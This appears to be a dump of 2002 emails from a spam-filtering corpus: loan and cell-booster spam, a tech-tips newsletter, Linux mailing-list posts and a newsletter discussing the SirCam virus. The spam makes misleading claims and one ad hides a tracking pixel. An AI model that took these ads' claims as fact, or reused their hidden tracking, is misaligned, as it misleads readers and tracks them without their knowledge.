     &lt;td align="center" valign="top"&gt;
       &lt;table border="0" cellspacing="0" cellpadding="0"&gt;
         &lt;tr&gt; 
           &lt;td colspan="3"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/grey_hr.gif" width="402" height="1"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" align="center" width="187" bgcolor="#FFFFCC"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="181"&gt;
               &lt;tr&gt; 
                 &lt;td align="left" valign="top"&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#660000"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;Total 
                   Lender Fees* &lt;/font&gt;&lt;br&gt;
                   &lt;/b&gt; &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td align="center" width="128" valign="top" bgcolor="#FFFFCC"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="111"&gt;
               &lt;tr&gt; 
                 &lt;td align="left" valign="top"&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#990000"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;$1025&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#CC6666"&gt;&lt;br&gt;
                   &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
           &lt;td align="center" width="89" valign="top" bgcolor="#FFFFCC"&gt; 
             &lt;table border="0" cellspacing="0" cellpadding="5" width="59"&gt;
               &lt;tr&gt; 
                 &lt;td valign="top" align="left"&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#990000"&gt;&lt;b&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;$0*&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="2" color="#CC6666"&gt; 
                   &lt;/font&gt;&lt;font face="Courier New, Courier, mono" size="-1" color="#CC6666"&gt;&lt;br&gt;
                   &lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;font size="2"&gt;&lt;br&gt;
       &lt;font face="Arial, Helvetica, sans-serif" color="#333333"&gt;The immediate 
       savings could mean more money for you to put toward bills, home improvements 
       or to use however you'd like.&lt;/font&gt;&lt;/font&gt;&lt;font face="Courier New, Courier, mono"&gt;&lt;br&gt;
       &lt;/font&gt;&lt;br&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#CC6600" size="-1"&gt;&lt;b&gt;&lt;font size="3" color="#FF9900"&gt;It's 
         simple to get started and there's no obligation.&lt;/font&gt;&lt;br&gt;
         &lt;i&gt;&lt;font size="3"&gt;Here's all you need to do&lt;/font&gt;&lt;/i&gt;&lt;font size="3"&gt;: 
         &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
         &lt;br&gt;
       &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td align="left" valign="top"&gt; 
       &lt;table border="0" cellspacing="0" cellpadding="5"&gt;
         &lt;tr&gt; 
           &lt;td align="left" valign="top" rowspan="2"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/1.gif" width="26" height="26"&gt;&lt;/td&gt;
           &lt;td align="left" valign="top"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#660000" size="-1"&gt;Find 
             the loan to fit your needs - even if you have less than perfect credit.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#CC0000"&gt;&amp;#149; 
             Mortgage Refinance Loans&lt;br&gt;
             &amp;#149; Home Equity Loans&lt;br&gt;
             &amp;#149; Personal Loans for Homeowners&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellspacing="0" cellpadding="5"&gt;
         &lt;tr&gt; 
           &lt;td align="left" valign="top" rowspan="2"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/2.gif" width="27" height="26"&gt;&lt;/td&gt;
           &lt;td align="left" valign="top"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#660000" size="-1"&gt;&lt;a href="https://www.householdloan.com/dl/lndl_Apply.jsp"&gt;Apply 
             Online&lt;/a&gt; and you're automatically qualified for our &amp;quot;No Lender's 
             Fees&amp;quot; offer. &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#CC0000"&gt;You'll 
             save $100's right away and as a Household customer you can take advantage 
             of our Pay Right Rewards, Online Bill Pay and many other benefits 
             - which means you could save money over time as well!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;&lt;tr&gt;
     &lt;td&gt;
       &lt;table border="0" cellspacing="0" cellpadding="5"&gt;
         &lt;tr&gt; 
           &lt;td align="left" valign="top" rowspan="2"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/3.gif" width="26" height="26"&gt;&lt;/td&gt;
           &lt;td align="left" valign="top"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#660000" size="-1"&gt;With 
             an approved loan, you could lower your monthly payments by $100's.&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td valign="top" align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#CC0000"&gt;Try 
             our &lt;a href="http://www.householdloan.com/dl/lndl_savingscalc.jsp"&gt;&lt;b&gt;Calculate 
             and Save tool&lt;/b&gt;&lt;/a&gt; and see for yourself!&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
  &lt;TR&gt;
     &lt;TD align="center"&gt; 
       &lt;p&gt;&lt;br&gt;
         &lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;&lt;font size="3" color="#CC6600"&gt;Don't 
         delay - This is a limited time offer! &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;a href="https://www.householdloan.com/dl/lndl_Apply.jsp"&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/applynow.gif" width="133" height="47" border="0"&gt;&lt;/a&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-2" color="#999999"&gt;Promotion 
         Expires 09/30/02&lt;/font&gt;&lt;/p&gt;
     &lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;img src="http://www.myhitmovie.com/campaign_images/Household_091002_images/grey_hr.gif" width="402" height="1" vspace="10"&gt;&lt;/TD&gt;
   &lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD valign="top"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#333333"&gt;&lt;b&gt;PS:&lt;/b&gt;&lt;br&gt;
       If you are a current Household customer (Household Finance Corporation, 
       Beneficial Corporation or their subsidiaries), please contact your branch 
       for more information on other great products&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="-1" color="#666666"&gt;. 
       &lt;br&gt;
       &lt;br&gt;
       &lt;font size="-2"&gt;* Not applicable in Illinois as origination fee may be charged. 
       You and your lender may negotiate discount points to buy down rates. Third 
       party fees such as title insurance, appraisal, closing fee, government recording 
       fee and other charges (where applicable) are the responsibility of the borrower. 
       All loans made by Household Finance Corporation (or subsidiares). &lt;/font&gt;&lt;br&gt;
       &lt;br&gt;
       As a Household company, we're part of a financial family that has been helping 
       working people since 1878. We have the experience, size and strength to 
       help you access the money you need. &lt;br&gt;&lt;br&gt;
       No time to apply right now? No problem, &lt;a href="https://www.householdloan.com/dl/lndl_Register.jsp"&gt;&lt;b&gt;click 
       here&lt;/b&gt;&lt;/a&gt; and register to receive future updates, information and special 
       offers.&lt;/font&gt;&lt;/TD&gt;
   &lt;/TR&gt;
 &lt;/table&gt;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src="http://www.salealerts.com/dot.gif" width=1 border=0&gt;
 &lt;/TD&gt;
     &lt;TD vAlign=top&gt;&lt;I&gt;&lt;/I&gt;&lt;FONT face=Verdana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href="http://www.frugaljoe.com/unsubscribe.php?eid=399843\~moc.cnietonten^^mj\~1754388\~12a1"&gt;here &lt;/a&gt;or
 cut and paste the following link into a web browser:&lt;br&gt;
  http://www.frugaljoe.com/unsubscribe.php?eid=399843\~moc.cnietonten^^mj\~1754388\~12a1
 &lt;br&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;IMG height=20
 src="http://www.salealerts.com/dot.gif" 
       width=459 border=0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;img src="http://www.330w.com/open/open.php?eid=zzzz@example.com&amp;oid=John-09222002-HTML&amp;custid=frugaljoe" border=0 height=0 width=0&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Neat Net Tricks Standard Issue 131 - August 15, 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">IN THIS ISSUE:
 01. Secure IE
 02. Disk cleanup on XP
 03. Thanks but no thanks
 04. Mouseless way home
 05. Kartoo
 06. XP time feature
 07. Leaf Peeper Alert
 08. Saving scraps
 09. Quick access
 10. Don't believe your email
 And What's Coming Up Next Week in NNT Premium
 01. SECURE IE.  For the past month or so, our Software Review Panel has 
 been giving a grueling test to Secure IE, a piece of software that blocks 
 Flash and pop-ups, prevents malicious file downloads, lets you customize 
 Security Zone settings as you browse dozens of Web sites simultaneously up 
 to five times faster with a tabbed interface, annotate Web page with sticky 
 notes and highlighter, and save complete Web pages, even secure server 
 (HTTPS) pages and archive online transaction receipts.  For what we believe 
 is one of the most thorough reviews ever conducted on a single piece of 
 software, check out what our Panel had to say at 
 http://www.NeatNetTricks.com/SoftwareReviews .  For a free trial download, 
 visit http://www.secureie.com .  And if this one sweeps you off your feet, 
 go to the NNT Store at http://www.NeatNetTricks.com/store and get a super 
 deal, just $17.50 if you order before September 14.  With a 30-day 
 guarantee, what's to lose?
 02. DISK CLEANUP ON XP.  Windows XP users can do some fast cleaning chores 
 with Disk Cleanup.  Access this tool from the Start menu by right clicking 
 on your hard drive.  Then select Properties and click on the Disk Cleanup 
 button to determine how many files can be safely deleted.
 03. THANKS BUT NO THANKS.  Continuing our periodic feature of 
 less-than-useful sites on the Web:  The International Center for Bathroom 
 Etiquette at http://www.icbe.org/ gets our recognition this issue.  It says 
 it's working hard to bring you the latest in cutting edge research and 
 technology regarding bathroom etiquette.  We'll resist some obvious puns.
 . . . . .
 West Virginia's Diane Stratton recommended NNT to some friends and is now 
 enjoying QuicKeys 2.0, a great Windows management software package.  Diane 
 is our latest winner and you could be next.  Just go to the NNT Web site at 
 http://www.NeatNetTricks.com and click on "Recommend NNT."  Nothing could 
 be easier.
 . . . . .
 04. MOUSELESS WAY HOME.  To go home quickly in Internet Explorer, touch F6 
 to highlight the Address Bar and type two periods (..) there.  The Enter 
 key then takes you home.
 05. KARTOO.  Search engines are everywhere on the Internet but Kartoo at 
 http://www.kartoo.net is quite unusual.  It's a meta search engine that 
 displays results on a map in the form of a ball.  The larger the ball, the 
 more relevant the result.  As you mouseover each result, site descriptions 
 are revealed.  If all that sounds confusing, the explanation is more 
 complicated than the service itself.  Just try it.
 . . . . .
 You should make it a habit to visit the NNT Store at 
 http://www.NeatNetTricks.com/store . We try to have several great products 
 there at a limited-time price much less than anywhere else on the Net. 
 Currently, you'll find excellent ebooks, a very effective popup stopper, 
 and the very useful utility described in item 01 above, along with the 
 usual opportunity to subscribe to NNT Premium and ArchivesExpress.  Check 
 us out, you'll be glad you did.
 . . . . .
 06. XP TIME FEATURE.  Windows XP added a nice feature that heretofore 
 required a separate software application.  It will connect, either at a 
 programmed time or manually, to a time server via the Internet and reset 
 that often erroneous internal clock.  Just click on the time in the systems 
 tray, go to Date and Time Properties and click the Internet Time tab.
 07. LEAF PEEPER ALERT.  A bit early, but soon the changing colors of autumn 
 will begin here in the U.S.  For those who like to follow the display, 
 consider http://www.stormfax.com/foliage.htm for a comprehensive collection 
 of links and toll-free numbers to each state to determine peak color times.
 08. SAVINGS SCRAPS.  Some oldies are worth repeating.  If you're working 
 with text in, for example, MS Word or WordPad, and would like a handy way 
 to save a portion for later easy retrieval, just select (highlight) it and 
 click/drag it to your desktop.  When the newly created icon is clicked on, 
 it will show the application with which the scrap was created, along with 
 the first few words of the text.  A double click opens the text in the 
 application with which it was created.
 09. QUICK ACCESS.  To go to a frequently used program, you may find 
 yourself drilling down to the desktop and searching out the shortcut 
 icon.  Consider instead setting up a key combination that will provide 
 quick access without using the shortcut. Right click on the shortcut and 
 select Properties.  In the Shortcut key window, select any key you can 
 remember and click OK.  Ctrl+Alt and that key will open the application 
 whenever needed.
 10.  DON'T BELIEVE YOUR EMAIL.  We've been asked about those emails with 
 virus attachments that appear to be coming from NNT, asking for a 
 confirmation of a subscription.  Don't believe it, and don't open the 
 attachments.  Maybe this exchange between NNT and Lyris (our mail manager) 
 will clear things up:
 NNT: Is there anything that can be done about the current strains of virus 
 that implant on address books and randomly send email asking alleged 
 subscribers to verify their subscription (when they haven't subscribed at 
 all)? I've received some of these as well, and I know it's become a 
 widespread problem with other ezine publishers, creating a lot of ill will 
 all around.  Is there some configuration that we could change to keep 
 these from going out except to legitimate subscribers?
 Lyris:  Unfortunately, there isn't much we can do about this since it 
 isn't actually ListManager doing the sending.  The real problem is that 
 people sometimes will add the "join" address to their address book and 
 that is what causes the problems.  The best we can do is advise people not 
 to have their address books set to automatically add any email address 
 that they send a message to even once.  The main culprit here seems to be 
 Outlook Express.
 WHAT'S COMING NEXT WEEK:  Another batch of Neat Net Tricks in the Premium 
 issue, including:
 *  A great collection of information and free downloads to make your system 
 more secure.
 *  Free software to measure and display your real-time Internet speed.
 *  Can you handle still another popup stopper - that's interference free - 
 and at no cost?
 *  An easy-to-use tool to store and arrange all your passwords, user IDs, 
 and other info.
 *  A Microsoft Word tip to easily work around that pesky autocompletion 
 feature.
 *  A whole arsenal of tools to combat spam.
 *  Software that provides more than 200 interesting facts about your 
 computer and displays about your CPU, memory, operating system, and your 
 computer's power source.
 *  Our in-depth article discusses how to best manage our important 
 passwords and get out of trouble when we -inevitably - forget those passwords.
 And more!  If you haven't subscribed yet, you won't find a better source of 
 useful information for just 42 cents per issue.  That's $10 for a year's 
 worth - 24 issues - at the NNT Store, http://www.NeatNetTricks.com/store .
 . . . . . .
 NNT makes no endorsement or warranty, expressed or implied, with regard to 
 featured products or services. Results may vary based on operating systems 
 and other variables beyond our control.
 For info on how to subscribe, unsubscribe, or change your address, send a 
 blank email to info-neatnettricks@silver.lyris.net .
 Sponsor an entire issue of NNT with your exclusive message to our readers 
 at very low rates. Send a blank email to 
 advertise-neatnettricks@silver.lyris.net .
 Comments or questions about your computer and the Internet? Visit the NNT 
 Bulletin Board at http://www.escribe.com/computing/neatnettricks/bb/ .
 NNT is hosted by Lyris.com, the best in email list management.
 Copyright 2002 by Jack Teems. All rights reserved. Neat Net Tricks is 
 registered with the U.S. Library of Congress ISSN: 1533-4619. 
 ---
 You are currently subscribed to neatnettricks as: xxxxxxxxxxxxxxxxx-neatnettricks@spamassassin.taint.org
 To unsubscribe send a blank email to leave-neatnettricks-2424157K@silver.lyris.net
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Fri, 19 Jul 2002 15:22:26 +0100
   | From: "Matthew French" &lt;mfrench42@yahoo.co.uk&gt;
   | 
   | Niall asked:
   |  &gt; I have about 60G of data which I need to copy from one disk to
   |  &gt; another.  [ ... ] The problem is the bulk of the data [ ... ]
   |  &gt; have two directory entries i.e. there is a hard link [ ... ]
   | 
   | How about something like:
   | 
   |    cd {dest.dir}
   |    tar -C {source.dir} cf - | tar xf -
   | 
   | tar cf - will pipe the tar file to stdout and tar xf - will untar it. This
   | should keep permissions and links, and if you do it as root you will keep
   | the owners too... :)
   | 
   | Not tested, though. You may need other flags as well.
  the above (or something close to it) will work.
  however, the data will be read and written twice by the
  1st (source) `tar', and read twice by the 2nd (sink) `tar',
  albeit only written once as the sink realizes the second
  copy is a hard link to the first.  with c.60Gb of data,
  that will make a difference, at least in time and CPU
  resource consumed (albeit, in this case, not storage).
  the issue here is tar(1) (and cpio(1)) archives always
  contain the data for each name of a hard link.  this is
  (probably) for several reasons, and is not necessarily a
  bad thing.   e.g., it provides a degree of redundancy to
  help cope with bad media.
  the source `tar' is creating an archive, which is being
  written down the pipe (to be consumed by the sink `tar').
  that is why storage is not an issue per se here, as the
  full archive is not "saved" --- if it were, you'd need
  at least 2x60Gb, or over 120Gb!   (the extra is `tar's
  overhead, which is minimal but does add up, esp. when
  a "large" blocking factor is used.)
 cheers!
 	-blf-
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
   For a résumé, contact me, or see my website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</si>
  <si>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Subject: Re: Stupid Idea Series: excreta &amp; emigration [Re: The great FEE]
</t>
  </si>
  <si>
    <t xml:space="preserve">Someone says,
 &gt; &gt; Wow. I'm so tempted to mail this guy several lbs of dog poop. I wonder
 &gt; &gt; what the shipping costs would be to Delaware?
 &gt;
 &gt; Shipping costs?  This sort of thing
 &gt; sounds perfect for decentralization --
 &gt; like flower delivery, freshness counts,
 &gt; and it's probably difficult to scale a
 &gt; single dog's output arbitrarily.  Find
 &gt; a dog owner in Delaware with a target
 &gt; in Scruz, and swap deliveries.  P2p?
 &gt;
 &gt; &gt; I learned when RHAT's support team was mailed some poo that it's really
 &gt; &gt; really illegal to do it.
 http://www.mailpoop.com has apparently been providing this service for a
 while now,
 along with http://www.smellypoop.com/order.html and
 http://www.dogdoo.com/Default.asp.
 Jeff;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Anyone know how I could remove a HDD password from an Acer Travelmate 201T?
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi folks,
 I have just taken delivery of three Acer Travelmate laptops from a project
 we funded which has now ended.  Problem is there are HDD passwords on them
 which I don't have.  How could I overwrite these?? Any ideas?  I have
 limited technical and monetry resources here in the new job so can't be
 buying new HDDs for them.
 Any Ideas?
 Dave
 www.davidcrozier.co.uk
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [OT] Irish language (was Re: [ILUG] Fwd: Linux Beer Hike)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 31 July 2002 12:02, Satelle, StevenX wrote:
 &gt; Its nothing to do with irish. It was the way it was tought. In primary I
 &gt; was made to stand up in front of the class and name all the items on a
 &gt; projector screen. My teacher knew that I didnt even know what hello was in
 &gt; irish (still dont) They tried to force me and as a result I managed to get
 &gt; 1% in the intercert and didnt even turn up for the leaving exam. I dislike
 &gt; being forced to learn something and mostly refuse to do it. I put effort
 &gt; into making sure I didnt learn Irish. My point was I knew more German after
 &gt; 6 months than 13 years of Irish. The way it is tought is wrong and people
 &gt; should have a choice about doing it.
 Irish is taught badly in schools. But then again so is French. I did 3 years
 of French in primary school and 6 in secondary school. So, that's 9 years of
 French. Which, I guess, should be long enough to be fluent in most languages.
 As it turns out, my French is crap. My Irish is much better. 
 The problem seems to be the braindead attempt to make people learn languages
 they can't speak through reading and writing. And then tacking on speech as
 an afterthought. Whereas doing it the other way round would be a lot more
 useful...
 I hear this complaint a lot, but I never hear people complaining about being
 "forced" to learn to read and write, or to do maths. Maybe people don't mind
 as much if it is perceived as a useful skill (which Irish is not usually
 perceived as).
 Anyway, tir gan teanga tir gan anam :)
 Nick
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Boost Your Cell Signal ...10782
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Cell Booster Antenna&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
 -1"&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;table width=3D"60%" border=3D"1" cellpadding=3D"0" cellspacing=3D"0" bord=
 ercolor=3D"#000099" align=3D"center"&gt;
   &lt;tr&gt;
     &lt;td bgcolor=3D"#000066"&gt;&lt;p align=3D"center"&gt;&lt;font color=3D"#FF9933" si=
 ze=3D"+3" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;strong&gt;BOOST 
         Your Reception&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;
         &lt;strong&gt;&lt;font color=3D"#FF9933" size=3D"6" face=3D"Geneva, Arial, =
 Helvetica, sans-serif"&gt;&lt;em&gt;on 
         any cell phone or cordless&lt;/em&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
   	&lt;td&gt;&lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D=
 "0"&gt;
   			&lt;tr&gt;
     			&lt;td align=3D"center"&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;
             &lt;p&gt;&lt;font color=3D"#000066" size=3D"6" face=3D"Geneva, Arial, H=
 elvetica, sans-serif"&gt;&lt;strong&gt;300% More Clarity!&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;stron=
 g&gt;Don't 
               buy another phone because of bad recepiton.&lt;br&gt;
               Improve your communication instantly by&lt;br&gt;
               simply installing this small chip.&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font color=3D"#009933" size=3D"4" face=3D"Verdana, Arial, =
 Helvetica, sans-serif"&gt;&lt;strong&gt;Powerful Reception Booster&lt;br&gt;
               Save 70%... As Seen On T.V.!&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;font color=3D"#FF6600" size=3D"4" face=3D"Verdana, Arial, =
 Helvetica, sans-serif"&gt;&lt;em&gt;&lt;strong&gt;No 
               other product compares!&lt;/strong&gt;&lt;/em&gt;&lt;/font&gt;&lt;/p&gt;
 					&lt;p&gt;&lt;ul&gt;&lt;li&gt;Ultra-thin and transparent&lt;/li&gt;
 					&lt;li&gt;Installs in a second!&lt;/li&gt;
               &lt;li&gt;&lt;strong&gt;Power of a 4ft antenna!&lt;/strong&gt;&lt;/li&gt;
 					&lt;li&gt;No more dropped or interrupted calls&lt;/li&gt;
 					&lt;li&gt;Work any place your singal may be weak!&lt;/li&gt;
 					&lt;li&gt;Advertised on T.V. for over 3 times the price.&lt;/li&gt;&lt;/ul&gt;&lt;/p&gt;
 					&lt;p&gt;&lt;font color=3D"#0066FF" size=3D"5" face=3D"Verdana, Arial, Helveti=
 ca, sans-serif"&gt;&lt;strong&gt;&lt;a href=3D"http://www.234sj.com/cellbooster/welcom=
 e.html?affid=3D1003"&gt;Click 
               Here Now&lt;/a&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;&lt;em&gt;&lt;strong&gt;&lt;font color=3D"#FF0033" size=3D"4" face=3D"Gene=
 va, Arial, Helvetica, sans-serif"&gt;"...it was so easy to 
               install..."&lt;/font&gt;&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
 					&lt;p&gt;To be removed from our database, &lt;a href=3D"http://234sj.com/remov=
 e/"&gt;click here&lt;/a&gt;.
 				&lt;/td&gt;
   			&lt;/tr&gt;
 		&lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Robot census
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85519849
 Date: Not supplied
 A new census of the world's robot population reveals disturbing negative robot 
 population growth, but still, our fleshless offspring's numbers point to a 
 machinery future: 
     Some 20,000 domestic-help robots were sold worldwide last year, half 
     designed to mow lawns. Vacuum-cleaning robots were introduced late in 2001 
     and a study in Sweden found that 5,000 were sold in the last two months of 
     the year. Window-cleaning robots are set to boom, said the U.N. study.  
 Link[1] Discuss[2] (_Thanks, Gatfishing!_)
 [1] http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20021003/ap_on_hi_te/un_robots
 [2] http://www.quicktopic.com/boing/H/WM8CuKADkMJR
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 06, 2002 at 04:24:09PM +0100, Joe Desbonnet wrote:
 &gt; I've found Micromail in Cork quite good:
 play247.com seems to be a good site for dvd's.  prices are in sterling,
 but they have free shipping.  plus they're selling buffy season 5 dvd's
 for 10 less then blackstar...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Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 9 Sep 2002, Ned Jackson Lovely wrote:
 &gt; In '87 a guy named Gregory Robertson noticed a fellow parachutist Debbie 
 &gt; Williams had been knocked unconscious. He shifted so that he was head down,
 &gt; hit about 200 mi/h, and caught up with her and pulled her chute with 10 seconds
 &gt; to spare.
 IIRC it's ~180 km/s spreadeagled and ~210 km/h head-down.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Membership Exchange, #441
</t>
  </si>
  <si>
    <t xml:space="preserve">--90840724.996748272348.JavaMail.RovAdmin.rovweb003
 Content-Type: text/plain; charset=iso-8859-1
 Your Membership Exchange, Issue #441 (August 2, 2001)
 ______________________________________________________
          Your Membership Daily Exchange
 &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; Issue #441 &lt;&gt; 08-02-01 &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
 Your place to exchange ideas, ask questions,
 swap links, and share your skills!
 ______________________________________________________
 Removal/Unsubscribe instructions are included at the bottom
 for members who do not wish to receive additional issues of
 this publication.
 ______________________________________________________
 You are a member in at least one of these programs
 - You should be in them all!
 http://www.BannersGoMLM.com
 http://www.ProfitBanners.com
 http://www.CashPromotions.com
 http://www.MySiteInc.com
 http://www.TimsHomeTownStories.com
 http://www.FreeLinksNetwork.com
 http://www.MyShoppingPlace.com
 http://www.BannerCo-op.com
 http://www.PutPEEL.com
 http://www.PutPEEL.net
 http://www.SELLinternetACCESS.com
 http://www.Be-Your-Own-ISP.com
 http://www.SeventhPower.com
 ______________________________________________________
 Today's Special Announcement:
 Right now, this week only - We have left over inventory, it's 
 unsold, but not for long.  If you could use 1 million banner 
 ads all targeted and dirt cheap go here today. This package 
 is guaranteed!! It's tough to fail when you can show your ad 
 to 1,000 people for less than a buck! A free custom banner 
 will be made for you with this deal! 
 http://BannersGoMLM.com/promo/million-nl.html
 ______________________________________________________
 ______________________________________________________
 &gt;&gt; Ideas, Tips, &amp; Information
            R. DeLong: More on the SirCam virus 
 &gt;&gt; Q &amp; A
    ANSWERS:
      - What can I do about my computer freezing?
            J. Shofstall: Many factors in the operating system that cause conflicts
 &gt;&gt; MEMBER SHOWCASES
 &gt;&gt; MEMBER *REVIEWS*
      - Sites to Review: #141, #142, #143  &amp; #144!
      - Site #140 Reviewed!
 ______________________________________________________
 &gt;&gt;&gt;&gt;&gt;&gt; Ideas, Tips, &amp; Information &lt;&lt;&lt;&lt;&lt;&lt;
 Do you have a special software program you find helpful, or
 even absolutely necessary? A neat tip that makes your online
 life a little easier? Share it and help other members save time,
 frustration, and a few steps in the learning curve. Submit
 your ideas, tips and information to MyInput@AEOpublishing.com
 From:  Richard DeLong   - homeaffiliate@mail.com
 Subject:  More on the SirCam virus 
 In Exchange Issue #440, JT wrote...
 &gt;It's called the SirCam virus, and when it spreads, it sends
 &gt;an apparently random file from the harddrives of infected
 &gt;computers along with it. ANY file on your machine could
 &gt;be copied and sent to hundreds of other users. 
 I also have received both the virus and email on how to get 
 rid of it.  Luckily I don't open ANY attachments, unless I'm 
 expecting them and then am still very careful.  
 Here's the ways I was told to get rid of the thing:
 One Fix Tool:
 Download fix_sircam.com and run the file. It will scan Drive
 C:\ and subfolders and runs in DOS.
 http://www.antivirus.com/vinfo/security/fix_sircam.com
